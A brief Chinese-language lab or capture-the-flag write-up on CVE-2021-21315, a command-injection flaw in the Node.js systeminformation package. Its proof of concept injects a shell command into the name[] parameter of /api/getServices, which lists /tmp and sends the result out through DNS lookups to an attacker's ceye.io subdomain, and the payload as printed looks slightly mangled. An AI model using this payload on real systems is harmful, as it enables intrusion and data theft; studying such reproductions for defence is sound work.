目录
0x01 漏洞背景
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。
影响版本:
Systeminformation < 5.3.1
0x02 漏洞复现
网站页面:
http://ceye.io里注册申请一个账号,得到一个申请的网址
构造POC:
原网址+
/api/getServices?name[]=$(ping%20ls%20/tmp
.你申请的网址)
在Records->DNS Query里查看得到flag